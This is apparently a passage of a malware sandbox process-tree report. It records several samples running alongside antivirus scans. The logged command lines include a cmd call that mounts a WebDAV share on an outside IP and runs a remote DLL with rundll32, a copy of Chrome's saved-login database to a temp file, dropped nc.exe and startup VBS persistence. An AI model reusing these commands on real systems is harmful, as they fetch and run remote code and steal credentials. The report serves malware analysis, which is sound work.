        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4808 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5556
      - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_restart.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_restart.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2220
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks SCSI registry key(s)
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:6836
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_oascan.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_oascan.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5460
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\USERS\ADMIN\DOWNLOADS\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.zip.crdownload" CALLER=VKOAS-DL
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4972
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanint.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanint.exe" "C:\Users\Admin\Downloads\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.zip"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4888
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanint.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanint.exe" "C:\Users\Admin\Downloads\0f2a1709c76bc4de9e0c41e7eff8a9033563cb8803afa88157174c772ffa0fa9.zip"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:6800
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanint.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanint.exe" "C:\USERS\ADMIN\DOWNLOADS\706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342.zip"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5620
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\epistemology.vbs" CALLER=VKOAS
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:836
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IgnorePersistedDecision.vbs" CALLER=VKOAS
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5216
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PO.vbs" CALLER=VKOAS
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vehiculate.vbs" CALLER=VKOAS
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5392
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_planrun.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_planrun.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4456
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_watchop.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_watchop.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1960
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" CALLER=VKWOP
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3712
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Users\Admin\Downloads\samples\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe" CALLER=VKWOP
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6964
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" CALLER=VKWOP
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1852
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Windows\SysWOW64\control.exe" CALLER=VKWOP
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2668
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scanfile.exe" "C:\Users\Admin\AppData\Local\Temp\AUTOIT3.EXE" CALLER=VK
        8⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\ProcessWatch2.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\ProcessWatch2.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks SCSI registry key(s)
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:4508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2724,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6700 /prefetch:8
    3⤵
    PID:1928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6624,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:1
    3⤵
    PID:1296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6068,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5984 /prefetch:1
    3⤵
    PID:1760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5764,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6368 /prefetch:8
    3⤵
    PID:4900
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6936,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5320 /prefetch:8
    3⤵
    PID:4508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=6180,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6196 /prefetch:1
    3⤵
    PID:4396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6200,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6016 /prefetch:1
    3⤵
    PID:2260
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5632,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5604 /prefetch:8
    3⤵
    PID:1348
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3228,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6500 /prefetch:8
    3⤵
    PID:5964
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6924,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6500 /prefetch:8
    3⤵
    PID:6820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6960,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5616 /prefetch:8
    3⤵
    PID:6916
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7016,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6308 /prefetch:8
    3⤵
    PID:5444
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7040,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6996 /prefetch:8
    3⤵
    PID:6228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6980,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6312 /prefetch:8
    3⤵
    PID:4580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5256,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5836 /prefetch:8
    3⤵
    PID:5760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5288,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5248 /prefetch:8
    3⤵
    PID:4792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5844,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6904 /prefetch:8
    3⤵
    PID:2044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5772,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6904 /prefetch:8
    3⤵
    PID:3256
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5856,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6692 /prefetch:8
    3⤵
    PID:6976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5956,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3524 /prefetch:8
    3⤵
    PID:5420
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192).zip"
  2⤵
  PID:5160
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)\" -an -ai#7zMap20860:196:7zEvent20110
  2⤵
  PID:5244
- C:\Users\Admin\Downloads\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)-D\Setup.exe
  "C:\Users\Admin\Downloads\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)-D\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1680
- - C:\Users\Admin\AppData\Roaming\DJGB\PVGFYBMUORIMQR\nc.exe
    C:\Users\Admin\AppData\Roaming\DJGB\PVGFYBMUORIMQR\nc.exe
    3⤵
    - Executes dropped EXE
    PID:3196
- - C:\Windows\SysWOW64\more.com
    C:\Windows\SysWOW64\more.com
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:1708
  - - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
      C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:6108
- C:\Users\Admin\Downloads\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)-D\Setup.exe
  "C:\Users\Admin\Downloads\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)\☬L∆T£$T☬S€TuP☬UnL◎ck C◎de☬(9192)-D\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3960
- - C:\Users\Admin\AppData\Roaming\DJGB\PVGFYBMUORIMQR\nc.exe
    C:\Users\Admin\AppData\Roaming\DJGB\PVGFYBMUORIMQR\nc.exe
    3⤵
    - Executes dropped EXE
    PID:5696
- - C:\Windows\SysWOW64\more.com
    C:\Windows\SysWOW64\more.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:7092
  - - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
      C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
      4⤵
      Loads dropped DLL
      PID:5424
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\*\" -ad -an -ai#7zMap22831:2446:7zEvent17428
  2⤵
  PID:4996
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\samples\0f2a1709c76bc4de9e0c41e7eff8a9033563cb8803afa88157174c772ffa0fa9\0f2a1709c76bc4de9e0c41e7eff8a9033563cb8803afa88157174c772ffa0fa9.js"
  2⤵
  - Checks computer location settings
  PID:6352
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\290261123016342.dll,Entry
    3⤵
    PID:7000
  - - C:\Windows\system32\net.exe
      net use \\94.159.113.82@8888\davwwwroot\
      4⤵
      PID:3216
  - - C:\Windows\system32\rundll32.exe
      rundll32 \\94.159.113.82@8888\davwwwroot\290261123016342.dll,Entry
      4⤵
      PID:3508
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\samples\7d92da1f57640af7e8776a504e1445e1c9ae2e93a23eb4b0d200445f395cbd06\7d92da1f57640af7e8776a504e1445e1c9ae2e93a23eb4b0d200445f395cbd06.jar"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  PID:904
- C:\Users\Admin\Downloads\samples\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exe
  "C:\Users\Admin\Downloads\samples\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6220
- - C:\Users\Admin\AppData\Local\prophetesses\epistemology.exe
    "C:\Users\Admin\Downloads\samples\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:6244
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\Downloads\samples\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250\7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4320
- C:\Users\Admin\Downloads\samples\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe
  "C:\Users\Admin\Downloads\samples\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:1948
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Users\Admin\Downloads\samples\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:1584
- C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scan.exe
  "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scan.exe" FILE "C:\Users\Admin\Downloads\samples\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d\09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  PID:3248
- - C:\Windows\SysWOW64\winver.exe
    "C:\Windows\SysWOW64\winver.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Modifies Internet Explorer settings
    - Suspicious behavior: MapViewOfSection
    PID:3936
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:4944
- C:\Users\Admin\Downloads\samples\9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e\9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe
  "C:\Users\Admin\Downloads\samples\9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e\9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:5612
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Users\Admin\Downloads\samples\9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e\9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID:2832
- C:\Windows\SysWOW64\control.exe
  "C:\Windows\SysWOW64\control.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: MapViewOfSection
  PID:5888
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Windows\SysWOW64\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:612
- - C:\Windows\SysWOW64\fsutil.exe
    "C:\Windows\SysWOW64\fsutil.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious behavior: MapViewOfSection
    PID:6104
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:6172
- - C:\Windows\SysWOW64\cmd.exe
    /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2368
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:1052
- C:\Users\Admin\Downloads\samples\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
  "C:\Users\Admin\Downloads\samples\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:5064
- - C:\Users\Admin\Downloads\samples\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
    "C:\Users\Admin\Downloads\samples\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9\26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4368
- C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_run.exe
  "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_run.exe"
  2⤵
  - Executes dropped EXE
  PID:3228
- C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_run.exe
  "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_run.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6196
- - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.exe
    "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Checks SCSI registry key(s)
    - Suspicious behavior: GetForegroundWindowSpam
    PID:5640
  - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_secad.exe
      "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_secad.exe"
      4⤵
      Executes dropped EXE
      Enumerates connected drives
      Maps connected drives based on registry
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:3732
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.viruskeeper.com/fr/wincerber_firewall.htm
        5⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5136
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
